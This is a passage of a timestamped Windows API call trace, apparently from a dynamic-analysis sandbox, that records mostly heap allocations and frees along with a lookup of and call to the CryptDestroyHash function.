[0122.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e8cd8 [0122.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0122.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0122.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0122.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0122.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0122.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0122.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0122.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0122.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0122.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0122.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0122.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0122.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0122.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0122.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0122.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0122.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0122.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0122.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0122.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0122.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0122.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0122.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0122.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0122.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0122.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0122.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0122.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9350 [0122.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0122.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0122.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0122.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0122.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0122.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0122.780] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0122.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0122.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0122.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0122.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0122.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0122.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0122.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0122.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caaf0 [0122.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac70 [0122.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac40 [0122.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0122.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab80 [0122.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad60 [0122.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caad8 [0122.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab08 [0122.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0122.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac88 [0122.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0122.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0122.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caac0 [0122.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0122.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caaa8 [0122.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab50 [0122.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0122.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cace8 [0122.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad48 [0122.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0122.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad78 [0122.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab20 [0122.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0122.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0122.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0122.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0122.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392500 [0122.784] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392500 | out: hHeap=0x1780000) returned 1 [0122.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0122.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab38 [0122.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0122.785] PeekMessageW (in: lpMsg=0x144e8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8b4) returned 0 [0122.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0122.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0122.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0122.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0122.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0122.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0122.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0122.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0122.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0122.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0122.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0122.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0122.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0122.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0122.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0122.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0122.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0122.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0122.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0122.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0122.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0122.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0122.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0122.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0122.785] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0122.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0122.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0122.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0122.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0122.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0122.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0122.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0122.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0122.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0122.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0122.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0122.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0122.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0122.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0122.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0122.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0122.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0122.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0122.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0122.786] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0122.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1796fc8 [0122.786] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796fc8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0122.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0122.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0122.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0122.786] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0122.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0122.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0122.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0122.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0122.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0122.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0122.787] CryptDestroyHash (hHash=0x41ac040) returned 1 [0122.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0122.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea040 [0122.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0122.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0122.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0122.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0122.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0122.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0122.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0122.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0122.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0122.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0122.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0122.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0122.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0122.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0122.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0122.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0122.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0122.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0122.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0122.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0122.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0122.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0122.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0122.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0122.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0122.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0122.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0122.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0122.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0122.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0122.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0122.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0122.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0122.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0122.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0122.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0122.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0122.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0122.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0122.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0122.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0122.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0122.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0122.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0122.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0122.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0122.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0122.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0122.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0122.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0122.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0122.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0122.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0122.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0122.789] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0122.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0122.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0122.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0122.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0122.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0122.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0122.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0122.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0122.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0122.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0122.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0122.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0122.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0122.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0122.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0122.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0122.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0122.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0122.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0122.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0122.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0122.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0122.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0122.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0122.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8cd8 | out: hHeap=0x1780000) returned 1 [0122.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0122.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0122.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0122.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0122.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0122.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0122.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0122.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0122.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0122.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0122.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0122.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0122.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0122.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0122.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0122.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0122.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0122.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0122.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0122.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0122.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0122.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0122.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0122.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0122.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 